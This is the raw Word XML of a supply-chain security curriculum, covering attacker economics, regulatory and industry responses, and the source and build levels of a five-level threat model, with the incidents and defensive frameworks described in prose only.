        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The structural problem — that open-source maintenance is done by volunteers under resource pressure, and that those volunteers make trust decisions that affect entire economies — remains unsolved. But the visibility of the problem is now much higher, and the defensive frameworks covered in the rest of this curriculum (SLSA, Sigstore, reproducible builds, SBOM) are in part attempts to mitigate the impact of the inevitable next successful long-con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6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">xz-utils represents the current publicly-known ceiling of supply chain attack sophistication: a three-year social-engineering campaign to gain maintainer access, followed by a technically exquisite backdoor hidden outside the git source tree, nearly reaching every production Linux server through a chain of transitive linkages. Detection was a lucky accident. The incident reinforced that source-tree review is insufficient, that reproducible builds materially reduce this class of attack, that the open-source maintenance model is itself a structural vulnerability, and that supply chain defenses must continue to evolve — because the attackers certainly will.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 7: Why Supply Chain Is the New Battleground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 The Shift in Attacker Economics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each of the five incidents covered in the previous chapters is a specific story, but together they reflect a systemic shift in how attackers allocate effort. Twenty years ago, the dominant model of application security was the direct attack: an attacker would probe an application's perimeter for a vulnerability, exploit it, and gain access to that specific application. Each attack was bespoke. The economics of defense and offense were roughly balanced — one attacker versus one defender, with outcomes depending on the relative skill and diligence of each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The shift is that attackers have discovered dramatically better economics in the supply chain. A single successful compromise — of a build tool, of a widely-used library, of a CI/CD platform, of a package registry — reaches tens of thousands of victims with a single act of attack. Compare to direct attacks: thousands of compromises at similar scale would require thousands of distinct attack efforts, thousands of initial footholds, thousands of persistent-access campaigns. The ROI of supply chain is simply higher by orders of magnitude.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Concretely:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A direct attack on SolarWinds would have yielded SolarWinds. The supply chain attack on SolarWinds yielded 18,000 organizations, with APT-quality access to the 100 most valuable of them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A direct attack on Codecov would have yielded... some coverage data. The supply chain compromise yielded the CI credentials of thousands of organizations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A direct attack on any one of the Log4j-using organizations would have required a specific foothold in that organization. The unpatched Log4j vulnerability gave attackers the equivalent of a master key usable against any organization that had not patched in the first 48 hours after disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The incentive structure is unmistakable. If you are an attacker with any strategic patience or resources, you allocate effort toward supply chain compromise, not direct exploitation. The Russian intelligence services, North Korean cyber operations, PRC-associated threat groups, and serious cybercriminal organizations have all shifted their operations accordingly over the past decade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 The Defender's Dilemma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For defenders, this shift has been uncomfortable. Traditional security programs were built around the direct-attack model: a security team protects a specific company, with visibility into that company's specific infrastructure. Supply chain attacks undermine the premises:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You cannot audit every dependency. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A modern application has thousands of dependencies across multiple ecosystems. Auditing them all, even once, is infeasible. Continuously auditing every one as they update is impossible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You cannot verify every vendor. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Every SaaS vendor you integrate with is a potential supply chain compromise point. Vendor questionnaires, SOC 2 reports, and similar do not reliably catch the kind of compromises we have seen — SolarWinds had good attestations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You cannot eliminate supply chain risk. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You could theoretically refuse to use any third-party code, but then you would have to build everything from scratch — including compilers, build systems, operating systems, and everything they depend on. No realistic organization does this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The defense must be architectural. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Since you cannot prevent every supply chain compromise from reaching you, you must make the compromises that do reach you less damaging. This is the orientation of the rest of this curriculum: make compromises detectable sooner (SBOM, signing), traceable to their source (provenance, attestation), and harder to accomplish in the first place (SLSA, reproducible builds).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 The Regulatory Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Governments have noticed the shift and begun regulating. Several specific developments worth knowing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">US Executive Order 14028 (May 2021). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Required federal software vendors to provide SBOMs, meet specific supply chain security standards, and adopt secure software development frameworks. Subsequent OMB memoranda operationalized these requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SSDF (Secure Software Development Framework). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">NIST SP 800-218, referenced by EO 14028, defines the controls federal software vendors must implement. It directly addresses supply chain concerns including provenance, dependency management, and build security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">EU Cyber Resilience Act (CRA). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Adopted in 2024, imposes supply chain security requirements on software sold in the EU, including SBOM availability and vulnerability handling obligations. Implementation deadlines extend into 2027.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">EU NIS2 Directive (2022). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Requires critical-infrastructure operators to manage supply chain risk as part of their cybersecurity obligations. The directive's specific requirements are being elaborated in national implementations through 2024–2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PCI-DSS v4.0 (2022). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Added explicit requirements around software development security and supply chain management for entities handling card data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The regulatory direction is clear: software vendors will be increasingly required to demonstrate specific supply chain controls, not merely assert that their software is secure. This accelerates the adoption of the tools covered in later modules — SBOM and signing in particular — because these are the mechanisms by which vendors can generate the evidence regulators require.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 The Industry Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond regulation, the industry has responded with standards, tools, and coordinated investment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OpenSSF (Open Source Security Foundation): cross-industry foundation hosting many of the tools in later modules — SLSA, Sigstore, Dependency Track, and various security-baseline efforts for open-source projects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SLSA (Supply-chain Levels for Software Artifacts): a graduated framework for build-system security, originating at Google and now stewarded by OpenSSF. Module 2 of this curriculum covers SLSA in depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SBOM standards: SPDX and CycloneDX as competing-but-complementary standards for representing software bills of materials. Module 3 covers these in depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sigstore: a free, public-good infrastructure for signing and verifying software artifacts, including keyless-signing and transparency-log mechanisms. Covered in later modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in-toto: a framework for attesting every step of a supply chain, providing a model for chained provenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reproducible builds: a movement focused on making builds bit-for-bit reproducible, so that different builders independently produce the same artifact — giving consumers a way to verify the artifact without trusting the builder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The common thread: turning the opaque, trust-me supply chain into one where each step produces verifiable evidence. The later modules of this curriculum are substantially about these tools and the practices they enable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7.5 The Limits of the Defensive Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A final note on what the defensive tools do not solve. No existing or proposed defensive framework completely eliminates supply chain risk. Specifically:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Signing proves origin, not intent. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A signed artifact from a compromised signing key is still a signed artifact. The SolarWinds-signed backdoor was a signed artifact. Signatures shift the attack from 'impersonate the vendor' to 'compromise the vendor's key' — an improvement, but not a solution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SBOMs require action to be useful. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An SBOM that is generated, shipped, and never consulted does nothing. The value comes from matching SBOMs against vulnerability databases and acting on the matches, which requires ongoing work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SLSA level 4 is hard. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The highest levels of SLSA require reproducible builds, two-party review, and hermetic build environments — all of which impose significant operational overhead. Most organizations will not reach SLSA 4 for most of their artifacts; the realistic goal is reaching SLSA 2 or 3 reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The weakest link determines the risk. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A fully SLSA-4-compliant application depends on SLSA-1 libraries; the effective supply chain security is bounded by the weakest component. Raising the ecosystem floor takes years and sustained investment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Social attacks are not solved. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xz-utils-style multi-year social engineering would succeed against most of the technical defenses we have today. The attacker was a legitimate maintainer operating through legitimate channels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">None of this is an argument against the defensive frameworks — they are significantly better than the alternative, which is no systematic defense at all. But it is a reminder that supply chain security is a discipline of making compromises harder and their consequences more bounded, not of making them impossible. The goal is to raise the cost of attack and lower the blast radius of success, not to achieve absolute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7</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Supply chain attacks have become the dominant high-leverage attack pattern because their economics are strictly better for attackers than direct attacks — one compromise reaches thousands of victims. Traditional defender models (audit every dependency, verify every vendor) do not scale. The response is architectural: tools and standards (SLSA, SBOM, signing, provenance, attestation) that make compromises detectable, traceable, and bounded. Regulatory action (EO 14028, EU CRA, NIS2) is pushing adoption broadly. No framework eliminates the risk; the goal is to raise attack costs and constrain blast radius.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 8: The Five-Level Threat Model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Why a Structured Threat Model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The incidents from Chapters 2–6 each illustrate different points along the supply chain — build server, tooling, dependency, ownership, release tarball. The remaining modules of this curriculum will address each of these with specific defenses. To organize that coverage coherently, it helps to have a shared threat model that names the categories of attack and the layers of the supply chain they target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This section presents the five-level threat model from the curriculum bullet: source, build, dependencies, distribution, runtime. Each level corresponds to a stage in the journey from developer-authored code to running production artifact. Each has its own attack vectors, its own defensive tools, and its own failure modes. The remainder of the curriculum is structured around defending each level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Level 1 — Source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The source level </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is where code is authored and stored. Attacks at this level aim to introduce malicious code into the source repository itself, either directly or through mechanisms that bypass code review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific attack vectors at the source level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious commits by a compromised contributor. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker gains access to a developer's account (via phishing, credential theft, or maintainer takeover) and pushes malicious code directly. event-stream is the canonical example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious pull requests that bypass review. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker submits a PR with malicious code. If the code is subtle enough, review may miss it. The more dependencies in the PR and the larger the diff, the more this risk grows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Typosquatting. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker publishes a package named similarly to a legitimate one (react-dom vs react-doom, urllib3 vs urllib-3) and waits for developers to install the wrong one. This is more of a dependency-level attack but often begins at source level where the package is consumed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Repository confusion / dependency confusion. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker publishes a package in a public registry with the same name as a company's internal private package. Mis-configured build systems may fetch the public (malicious) version over the private (legitimate) one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Branch protection bypass. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker finds a way to commit directly to a protected branch — a force push while protections are briefly disabled, a compromised admin account, a misconfigured ruleset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defenses at the source level: code review, branch protection, signed commits, multi-party review for sensitive files (CODEOWNERS), commit signing verification, dependency pinning, static analysis and secret scanning (covered extensively in the Secrets Management curriculum). These are the traditional tools of source-code security, updated for supply chain concerns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 Level 2 — Build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The build level </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is where source code is compiled, packaged, and turned into distributable artifacts. Attacks at this level aim to corrupt the build process — such that legitimate source produces compromised output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific attack vectors at the build level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised build server. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SolarWinds' SUNSPOT is the canonical example. The build server is subverted; every build through it is potentially corrupt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious build scripts. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The build configuration (Dockerfile, Makefile, setup.py, build.gradle) includes steps that inject malicious code or exfiltrate secrets. Because build scripts have full control of the build environment, a compromised script is effectively a compromised build.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Non-reproducible builds. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Builds that depend on environment (time of day, machine configuration, network state) cannot be verified by independent rebuilding. A subverted build is indistinguishable from a legitimate one because no reference exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Build-time dependency injection. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The build pulls in dependencies at build time (downloading from the internet during build). An attacker who controls any of those endpoints can inject malicious content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CI credential theft. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Codecov is the canonical example. The build environment has broad credentials; compromising tools that run in that environment exfiltrates those credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
